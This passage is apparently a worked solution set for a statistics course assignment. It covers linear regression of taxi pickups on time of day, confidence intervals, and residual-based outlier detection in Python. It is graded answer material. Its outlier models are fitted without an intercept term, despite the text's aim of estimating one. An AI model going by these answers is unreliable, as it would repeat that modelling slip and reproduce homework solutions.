print("R-squared for %s is %f" % (t, r2_score(data['PickupCount'].values, OLS_predictions[t])))
```
**3.4 Report the estimates for the slope and intercept for the fitted linear model.**
```
print(results.summary())
print("Slope is %.3f" % results.params['TimeMin'])
print("Intercept is %.2f" % results.params['const'])
```
**3.5 Report the $95\%$ confidence intervals (CIs) for the slope and intercept.**
```
ci = results.conf_int(alpha=0.05)
print("95%% confidence interval for slope is [%.4f, %.4f]" % tuple(ci.loc['TimeMin']))
print("95%% confidence interval for intercept is [%.2f, %.2f]" % tuple(ci.loc['const']))
```
**3.6 Discuss the results:**
1. How does the test $R^2$ score compare with the best test $R^2$ value obtained with k-NN regression? Describe why this is not surprising for these data.
The test $R^2$ is much lower than the best k-NN value. This is not surprising: pickups rise and fall over the course of the day, so the relationship with time is strongly nonlinear, and a single straight line cannot capture the local structure that k-NN exploits.
2. What does the sign of the slope of the fitted linear model convey about the data?
Generally speaking, the later in the day it is, the more pickups we should expect.
3. Interpret the $95\%$ confidence intervals from 3.5. Based on these CIs is there evidence to suggest that the number of taxi pickups has a significant linear relationship with time of day? How do you know?
Since the $95\%$ CI for the slope does not contain $0$, we have evidence at the $5\%$ significance level that the number of taxi pickups has a significant (positive) linear relationship with time of day.
4. How would $99\%$ confidence intervals for the slope and intercept compare to the $95\%$ confidence intervals (in terms of midpoint and width)? Briefly explain your answer.
The $99\%$ confidence intervals would have the same midpoints (the point estimates) but would be wider: the critical value grows from roughly $1.96$ to $2.58$ standard errors, so each interval widens by just over half a standard error on each side (see the quick check after this list).
5. Based on the data structure, what restriction on the model would you put at the endpoints (at $x\approx0$ and $x\approx1440$)? What does this say about the appropriateness of a linear model?
$x\approx0$ and $x\approx1440$ represent the same time on successive days, and therefore our predictions for the two should be the same if the day within the week is unknown. The fact that the linear model shows a statistically significant positive slope thus provides a further confirmation that the linear model is inappropriate.
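A quick numerical check of the widening claimed in point 4 (a sketch using the normal approximation rather than exact $t$ critical values):

```
from scipy.stats import norm
z95, z99 = norm.ppf(0.975), norm.ppf(0.995)
print("z for 95%%: %.3f, z for 99%%: %.3f, extra width per side: %.2f standard errors" % (z95, z99, z99 - z95))
```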
<hr>
## <div class="theme"> Outliers </div>
You may recall from lectures that OLS Linear Regression can be susceptible to outliers in the data. We're going to look at a dataset that includes some outliers and get a sense for how that affects modeling data with Linear Regression. **Note, this is an open-ended question, there is not one correct solution (or even one correct definition of an outlier).**
### <div class="exercise"><b> Question 4 [30 pts] </b></div>
**4.1**. We've provided you with two files `outliers_train.csv` and `outliers_test.csv` corresponding to training set and test set data. What does a visual inspection of training set tell you about the existence of potential outliers in the data?
**4.2**. Choose `X` as your feature variable and `Y` as your response variable. Use `statsmodel` to create a Linear Regression model on the training set data. Store your model in the variable `OutlierOLSModel`.
**4.3**. You're given the knowledge ahead of time that there are 3 outliers in the training set data. The test set data doesn't have any outliers. You want to remove the 3 outliers in order to get the optimal intercept and slope. In the case that you're sure of the existence and number (3) of outliers ahead of time, one potential brute force method to outlier detection might be to find the best Linear Regression model on all possible subsets of the training set data with 3 points removed. Using this method, how many times will you have to calculate the Linear Regression coefficients on the training data?
**4.4** Construct an approximate algorithm to find a user-specified number of outlier candidates in the training data. Place your algorithm in the function `find_outliers_simple`. It should take the parameters `dataset_x`, `dataset_y`, and `num_outliers` representing your features, response variable values (make sure your response variable is stored as a numpy column vector), and the number of outliers to remove. Your algorithm should select the `num_outliers` most extreme residuals from the linear regression model to predict, `dataset_y` from `dataset_x`. The return value should be a list `outlier_indices` representing the indices of the `num_outliers` outliers in the original datasets you passed in. Apply your function to the training data in order to identify 3 outliers. Use `statsmodels` to create a Linear Regression model on the remaining training set data (with the 3 outliers removed), and store your model in the variable `OutlierFreeSimpleModel`.
**4.5** Create a figure with two subplots: the first is a scatterplot where the color of the points denotes the outliers from the non-outliers in the training set, and include two regression lines on this scatterplot: one fitted with the outliers included and one fitted with the outlier removed (all on the training set). The second plot should include a scatterplot of points from the test set with the same two regression lines fitted on the training set: with and without outliers. Visually which model fits the test set data more closely?
**4.6**. Calculate the $R^2$ score for the `OutlierOLSModel` and the `OutlierFreeSimpleModel` on the test set data. Which model produces a better $R^2$ score?
**4.7**. One potential problem with the brute force outlier detection approach in 4.3 and the heuristic algorithm you constructed 4.4 is that they assume prior knowledge of the number of outliers. In general you can't expect to know ahead of time the number of outliers in your dataset. Propose how you would alter and/or use the algorithm you constructed in 4.4 to create a more general heuristic (i.e. one which doesn't presuppose the number of outliers) for finding outliers in your dataset.
**Hints**:
1. Should outliers be removed one at a time or in batches?
2. What metric would you use and how would you use it to determine how many outliers to consider removing?
### Answers
**4.1 We've provided you with two files `outliers_train.csv` and `outliers_test.csv` corresponding to training set and test set data. What does a visual inspection of training set tell you about the existence of outliers in the data?**
```
out_train = pd.read_csv('data/outliers_train.csv')
out_test = pd.read_csv('data/outliers_test.csv')
fig, ax = plt.subplots(2,1)
ax[0].scatter(out_train['X'],out_train['Y'])
ax[0].set_title("Training data")
ax[1].scatter(out_test['X'],out_test['Y'])
ax[1].set_title("Test data")
plt.show()
```
The data overall seems pretty loosely correlated (showing an upward slope), with some severe outliers (especially in the training data). For example, the training data has points at roughly (-2, 300) and (2, -300), which will distort a linear regression.
**4.2 Choose `X` as your feature variable and `Y` as your response variable. Use `statsmodel` to create a Linear Regression model on the training set data. Store your model in the variable `OutlierOLSModel`.**
```
OutlierOLSModel = OLS(out_train['Y'], out_train['X'])
outlier_model_results = OutlierOLSModel.fit()
```
**4.3 You're given the knowledge ahead of time that there are 3 outliers...Using this method, how many times will you have to calculate the Linear Regression coefficients on the training data?**
We know that the training set has 53 rows, so the brute force method would require fitting a separate linear regression for every subset with 3 points removed: $\binom{53}{50} = \binom{53}{3} = 23{,}426$ regressions.
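A one-line check of that count (assuming, as stated, that `out_train` has 53 rows):

```
from scipy.special import comb
print(len(out_train), comb(53, 3, exact=True))   # C(53, 50) == C(53, 3) == 23426
```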
**4.4 Construct an approximate algorithm to find a user-specified number of outlier candidates in the training data...**
```
def find_outliers_simple(dataset_x, dataset_y, num_outliers):
    # Fit an OLS model on the full data and rank points by the size of their residuals.
    fitted = OLS(dataset_y, dataset_x).fit()
    residuals = np.abs(np.asarray(dataset_y) - np.asarray(fitted.predict(dataset_x)))
    # Indices (positions) of the num_outliers largest absolute residuals.
    outlier_indices = np.argsort(residuals)[-num_outliers:]
    return list(outlier_indices)
outliers = find_outliers_simple(out_train['X'], out_train['Y'], 3)
out_train_no_outliers = out_train.drop(outliers)
OutlierFreeSimpleModel = OLS(out_train_no_outliers['Y'], out_train_no_outliers['X'])
outlier_free_model_results = OutlierFreeSimpleModel.fit()
```
**4.5 Create a figure with two subplots: the first is a scatterplot where the color of the points...**
```
fig, ax = plt.subplots(1,2)
ax[0].scatter(out_train['X'], out_train['Y'])
ax[0].scatter(out_train_no_outliers['X'], out_train_no_outliers['Y'], color='orange')
ax[0].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[0].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[0].set_title("Training set")
ax[1].scatter(out_test['X'], out_test['Y'])
ax[1].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[1].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[1].set_title("Test set")
plt.show()
```
The regression line fitted without the outliers tracks the test data more closely. The outliers pull the slope of the full-data fit (the model weights) away from the bulk of the points.
**4.6 Calculate the $R^2$ score for the `OutlierOLSModel` and the `OutlierFreeSimpleModel` on the test set data. Which model produces a better $R^2$ score?**
```
print("R-squared for OutlierOLSModel is %f" % (r2_score(out_test['Y'].values, outlier_model_results.predict(out_test['X']))))
print("R-squared for OutlierFreeSimpleModel is %f" % (r2_score(out_test['Y'].values, outlier_free_model_results.predict(out_test['X']))))
```
The outlier-free model produces a better $R^2$ value.
**4.7 One potential problem with the brute force outlier detection approach in 4.3 and the heuristic algorithm you constructed 4.4 is that they assume prior knowledge of the number of outliers...**
Rather than removing a pre-set number of points, I would find outliers in the data by removing any points where the residual was more than 3 standard deviations above or below the mean of the residuals. This would filter out all extreme outliers at once, regardless of how many there are.
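A hedged sketch of one way to implement this (one reasonable choice among many, not a prescribed solution): repeatedly fit the model, drop every point whose absolute residual exceeds 3 standard deviations of the current residuals, and stop once nothing is flagged.

```
def find_outliers_zscore(dataset_x, dataset_y, threshold=3.0, max_iter=10):
    # Iteratively drop points whose |residual| exceeds `threshold` residual standard deviations.
    x = pd.Series(dataset_x).reset_index(drop=True)
    y = pd.Series(dataset_y).reset_index(drop=True)
    keep = pd.Series(True, index=x.index)
    for _ in range(max_iter):
        fitted = OLS(y[keep], x[keep]).fit()
        resid = y[keep] - fitted.predict(x[keep])
        flagged = np.abs(resid) > threshold * resid.std()
        if not flagged.any():
            break
        keep[flagged[flagged].index] = False
    return list(keep[~keep].index)   # positions of the detected outliers

print(find_outliers_zscore(out_train['X'], out_train['Y']))
```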